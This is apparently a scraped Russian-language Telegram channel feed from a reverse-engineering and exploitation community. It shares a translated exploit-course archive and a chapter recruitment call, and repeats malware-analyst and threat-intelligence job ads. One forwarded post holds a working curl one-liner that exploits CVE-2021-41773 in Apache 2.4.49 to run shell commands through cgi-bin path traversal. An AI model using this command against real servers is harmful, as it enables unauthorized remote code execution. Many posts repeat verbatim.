Специально для мамкиных вымогателей публикуем архив статей. Отдельное спасибо комьюнити менеджеру Дарвину.
Forwarded from Darwin
R0 (Courses).7z
10.4 MB
Спец. выпуск для школьников, которые не осилили английский. Переводы курсов по эксплуатации, из ушедших в небытие русских материалов с форума.
1. Exploit Writing Tutorial (by corelanc0d3r)
2. Exploit Development Course (expdev-kiuhnm)
1. Exploit Writing Tutorial (by corelanc0d3r)
2. Exploit Development Course (expdev-kiuhnm)
Forwarded from Кавычка (Bo0oM)
Недавняя CVE-2021-41773 в Apache 2.4.49, это не только выход из директории с чтением файлов, как многие подумали
curl --data "A=|echo;id" 'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'🚨🚨
Алярм аляр
Перспективный молодняк, кто хочет сменить пол и познавать все глубины бинарщины.
Кто хочет создать Украинский чаптер r0crew?
Чтобы активно форсить и развивать данную тему в рамках локального рынка и комьюнити. А то движуха по другим странам есть, а у нас как-то кисло, старики ленятся поэтому нужна свежая кровь.
Алярм аляр
Перспективный молодняк, кто хочет сменить пол и познавать все глубины бинарщины.
Кто хочет создать Украинский чаптер r0crew?
Чтобы активно форсить и развивать данную тему в рамках локального рынка и комьюнити. А то движуха по другим странам есть, а у нас как-то кисло, старики ленятся поэтому нужна свежая кровь.
🇺🇦x_Notes🇺🇦 🔜 pinned «🚨🚨 Алярм аляр Перспективный молодняк, кто хочет сменить пол и познавать все глубины бинарщины. Кто хочет создать Украинский чаптер r0crew? Чтобы активно форсить и развивать данную тему в рамках локального рынка и комьюнити. А то движуха по другим странам…»
Forwarded from Serhii Khariuk
Сначала ты ебанутый, потом интересуешься реверсом. Пока учишь ещё больше сходишь с ума, ибо сычуешь, через пару лет ты ебанутый на голову социопат который ломает денуву за пару часов, а потом идёшь пить кровь бомжей на жертвоприношении.
Новый мопэд господа. Опять же не мой, попросили разместить.
Malware analyst в новый проект.
Позиция в офисе (Киев) или Remote (нужно быть зарегистрированным в Украине официально). Оплата ~$4000
Сновные задачи и требования:
detecting and analyzing malicious code in document (PDF/Word/Excel/PPT)
create detection logic (static/dynamic pattern extraction, detection thresholds tuning, signatures)
infra for streamlined processing, automation (classification sandbox, de-obfuscation oth.)
experience with malicious code in documents (PDF/Word/Excel/PPT)
experience with obfuscators/loaders/packers (typical protection methods & bypass)
relevant prior employment: either antivirus company or 2+ year of reverse engineering
solid understanding of detection techniques: heuristics, signatures
automation skills: noscripting (Python), sandbox customization (OS monitors, detection logic), development (C, C++, C#) toolset: IDA, GDB, process/filesystem/network/registry monitors, debuggers/disassemblers/memdumpers, virtualization infra
P.S. В случае чего, я ни при делах
P.P.S. Контакт удалён по причине «денег не приносит»
Malware analyst в новый проект.
Позиция в офисе (Киев) или Remote (нужно быть зарегистрированным в Украине официально). Оплата ~$4000
Сновные задачи и требования:
detecting and analyzing malicious code in document (PDF/Word/Excel/PPT)
create detection logic (static/dynamic pattern extraction, detection thresholds tuning, signatures)
infra for streamlined processing, automation (classification sandbox, de-obfuscation oth.)
experience with malicious code in documents (PDF/Word/Excel/PPT)
experience with obfuscators/loaders/packers (typical protection methods & bypass)
relevant prior employment: either antivirus company or 2+ year of reverse engineering
solid understanding of detection techniques: heuristics, signatures
automation skills: noscripting (Python), sandbox customization (OS monitors, detection logic), development (C, C++, C#) toolset: IDA, GDB, process/filesystem/network/registry monitors, debuggers/disassemblers/memdumpers, virtualization infra
P.S. В случае чего, я ни при делах
P.P.S. Контакт удалён по причине «денег не приносит»
Forwarded from ruDALL-E Malevich (XL)
Фото сгенерировано моделью ruDALL-E от Сбера по запросу "Ximerus"
🛺🚨🛺
Всем доброго пятничного вечера, сегодня у нас целых три вакансии заточенные под скилы в реверсинге.
Буду постить по одной чтобы понимать на что человек откликнулся:
Base skills/attributes – all positions:
• Help create and maintain optimal workflows.
• Tailor and curate data into intelligence for specific industry sectors, knowledge areas and threat priorities.
• Identify gaps in intelligence sources.
• Have a general understanding of machine learning and natural learning techniques.
• Author easily consumable reports to senior management and to analysts and threat hunters which empower actionable and timely decisions making.
• Develop and sustain cybersecurity cultures.
• Understand risk.
• Ensure value is derived at the executive level of consumption.
Researcher (Methodical and reliable.)
Ideal background: Computer science and programming.
Main function: Perform detailed analysis on specific new and emerging threats. Author and contribute value to reports for other cyber threat intelligence team members and for executive level decisions makers.
• Identify new or existing threats and distill this information into concise finished intelligence to multiple internal partners, including executives.
• Perform intelligence research during incident response, supporting multiple teams and drive direction of investigations based on knowledge of attackers.
• Managing threat data and create intelligence assessments and output in support of our incident response, threat hunting, threat detection, and security engineering missions.
• Write noscripts and tools on the fly to help with analysis and build automation to aid the investigation or research the next time around.
• Conduct proactive research into environments of intelligence interest, to include hidden sites.
• Experience in human intelligence.
• Apply threat intelligence and its application towards operational/business goals/objectives.
• Reasonable level of proficiency in language/code assembly and disassembly.
• Background in advanced reverse engineering on file-based threats, exploits, and other attack techniques are desirable to be demonstrated at a moderate skill level.
• Familiarity with MITRE ATT&CK Framework
• Foreign language fluency is a bonus.
Всем доброго пятничного вечера, сегодня у нас целых три вакансии заточенные под скилы в реверсинге.
Буду постить по одной чтобы понимать на что человек откликнулся:
Base skills/attributes – all positions:
• Help create and maintain optimal workflows.
• Tailor and curate data into intelligence for specific industry sectors, knowledge areas and threat priorities.
• Identify gaps in intelligence sources.
• Have a general understanding of machine learning and natural learning techniques.
• Author easily consumable reports to senior management and to analysts and threat hunters which empower actionable and timely decisions making.
• Develop and sustain cybersecurity cultures.
• Understand risk.
• Ensure value is derived at the executive level of consumption.
Researcher (Methodical and reliable.)
Ideal background: Computer science and programming.
Main function: Perform detailed analysis on specific new and emerging threats. Author and contribute value to reports for other cyber threat intelligence team members and for executive level decisions makers.
• Identify new or existing threats and distill this information into concise finished intelligence to multiple internal partners, including executives.
• Perform intelligence research during incident response, supporting multiple teams and drive direction of investigations based on knowledge of attackers.
• Managing threat data and create intelligence assessments and output in support of our incident response, threat hunting, threat detection, and security engineering missions.
• Write noscripts and tools on the fly to help with analysis and build automation to aid the investigation or research the next time around.
• Conduct proactive research into environments of intelligence interest, to include hidden sites.
• Experience in human intelligence.
• Apply threat intelligence and its application towards operational/business goals/objectives.
• Reasonable level of proficiency in language/code assembly and disassembly.
• Background in advanced reverse engineering on file-based threats, exploits, and other attack techniques are desirable to be demonstrated at a moderate skill level.
• Familiarity with MITRE ATT&CK Framework
• Foreign language fluency is a bonus.
Base skills/attributes – all positions:
• Help create and maintain optimal workflows.
• Tailor and curate data into intelligence for specific industry sectors, knowledge areas and threat priorities.
• Identify gaps in intelligence sources.
• Have a general understanding of machine learning and natural learning techniques.
• Author easily consumable reports to senior management and to analysts and threat hunters which empower actionable and timely decisions making.
• Develop and sustain cybersecurity cultures.
• Understand risk.
• Ensure value is derived at the executive level of consumption.
Analyst (Detailed, very.)
Ideal background: Vulnerability discovery/pen testing, network, and system admin background with knowledge of noscripting.
Main function: Maintain indicators and artifacts in a manner that provides constant organizational cyber threat awareness. Author and contribute value to reports for other cyber threat intelligence team members and for executive level decisions makers.
• In-depth understanding of threat intelligence cycles and collection management.t
• In-depth understanding of IP network traffic.
• Experience in analyzing security vulnerabilities, various exploitation techniques, and malware behaviors (including communications protocols).
• Experience with host and network-based protection technologies.
• Strong understanding of threat protection/detection tooling/stacks used for endpoint, network, and cloud: SIEM, TIP, SOAR, Security Analytics.
• Participated in sharing threat intelligence through ISACs, Trust Groups, intelligence partnerships, or other open communities.
• Familiarity with MITRE ATT&CK Framework.
• Foreign language fluency is a bonus.
• Help create and maintain optimal workflows.
• Tailor and curate data into intelligence for specific industry sectors, knowledge areas and threat priorities.
• Identify gaps in intelligence sources.
• Have a general understanding of machine learning and natural learning techniques.
• Author easily consumable reports to senior management and to analysts and threat hunters which empower actionable and timely decisions making.
• Develop and sustain cybersecurity cultures.
• Understand risk.
• Ensure value is derived at the executive level of consumption.
Analyst (Detailed, very.)
Ideal background: Vulnerability discovery/pen testing, network, and system admin background with knowledge of noscripting.
Main function: Maintain indicators and artifacts in a manner that provides constant organizational cyber threat awareness. Author and contribute value to reports for other cyber threat intelligence team members and for executive level decisions makers.
• In-depth understanding of threat intelligence cycles and collection management.t
• In-depth understanding of IP network traffic.
• Experience in analyzing security vulnerabilities, various exploitation techniques, and malware behaviors (including communications protocols).
• Experience with host and network-based protection technologies.
• Strong understanding of threat protection/detection tooling/stacks used for endpoint, network, and cloud: SIEM, TIP, SOAR, Security Analytics.
• Participated in sharing threat intelligence through ISACs, Trust Groups, intelligence partnerships, or other open communities.
• Familiarity with MITRE ATT&CK Framework.
• Foreign language fluency is a bonus.